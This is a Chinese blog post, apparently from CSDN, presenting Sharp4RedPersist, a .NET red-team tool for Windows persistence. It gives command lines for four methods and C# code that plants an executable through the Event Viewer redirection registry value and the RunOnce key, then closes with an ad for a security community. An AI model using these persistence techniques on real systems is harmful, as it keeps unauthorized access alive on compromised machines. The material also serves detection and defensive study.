• .NET 一款支持8种方式维持权限的工具

    01阅读须知

    此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

    02基本介绍

    Sharp4RedPersist是一款功能强大的持久化工具,专为在Windows环境中操作的红队设计。通过利用各种持久化机制,这款工具能够在被攻陷的系统上维持访问权限。Sharp4RedPersist支持八种或更多不同的方法,确保通过多个向量保持持久访问。

    图片

    03使用方法

    Sharp4RedPersist支持以下持久化方法,每种方法都可以使用特定的命令行参数调用。

    3.1 EventViewer

    事件查看器:通过操纵事件查看器助手实现持久化。

    Sharp4RedPersist.exe --eventviewer C:\Users\User\exe.exe

    3.2 Startup

    启动项:通过将可执行文件添加到系统启动项来确保持久化

    Sharp4RedPersist.exe --startup C:\Users\User\exe.exe

    3.3 Autologon

    自动登录:利用自动登录功能实现持久化

    Sharp4RedPersist.exe --autologon C:\Users\User\exe.exe

    3.4 Screensaver

    屏幕保护程序:通过屏幕保护程序设置实现持久化。

    Sharp4RedPersist.exe --screensaver C:\Users\User\exe.exe

    04编码实现

    Sharp4RedPersist工具主要通过修改Windows注册表来操作,Windows注册表是存储配置设置和选项的重要组件。以下是事件查看器和启动项方法的实现,展示了Sharp4RedPersist如何通过操纵注册表项实现持久化。

    事件查看器方法在Microsoft\Windows NT\CurrentVersion\Event Viewer下创建一个注册表项,并将重定向URL设置为指定的可执行文件:

    1. public class Eventviewer1
    2. {
    3.     public static void Do(string[] args)
    4.     {
    5.         RegistryKey hklm = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
    6.         RegistryKey key = hklm.OpenSubKey("SOFTWARE"true);
    7.         key = key.CreateSubKey("Microsoft\\Windows NT\\CurrentVersion\\Event Viewer");
    8.         key.SetValue("MicrosoftRedirectionUrl", args[1], RegistryValueKind.String);
    9.         key.Close();
    10.         Console.WriteLine("[*] Eventviewer Persistence created");
    11.     }
    12. }

    启动项方法在SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce下创建一个注册表项,确保可执行文件在启动时运行:

    1. public class Startup1
    2. {
    3.     public static void Do(string[] args)
    4.     {
    5.         RegistryKey key = Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce");
    6.         key.SetValue("detect", args[1]);
    7.         key.Close();
    8.         Console.WriteLine("[*] Startup Persistence created");
    9.     }
    10. }

    05.NET安全星球

    从.NET Framework到.NET Core,从Web应用到PC端软件应用,并且每日分享.NET安全技术干货以及交流解答各类技术等问题。

    图片

    图片

    图片

    20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    图片

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

    图片

    图片

  • 相关阅读:
    阶段五-Day03-Ajax
    Cloudflare CDN(泛播)支持转发的网络端口
    Liunx常用命令
    你真的了解 Session 和 Cookie 吗?
    【vue3源码】十三、认识Block
    FITC标记的脱氧胆酸修饰右旋糖酐纳米粒子,FITC-Dex-DCA-FI/FA NPs
    论文笔记: 全波形反演的无监督学习: 将 CNN 与偏微分方程做成一个环
    新库上线 | CnOpenDataA股上市公司IPO申报发行文本数据
    一句话概括C#7.3+以后版本的??(俩问号)和??=(俩问号一个等于)的含义
    k8s-kubernetes常用命令,服务部署,可视化控制台安装及token的生成
  • 原文地址:https://blog.csdn.net/ahhacker86/article/details/139976533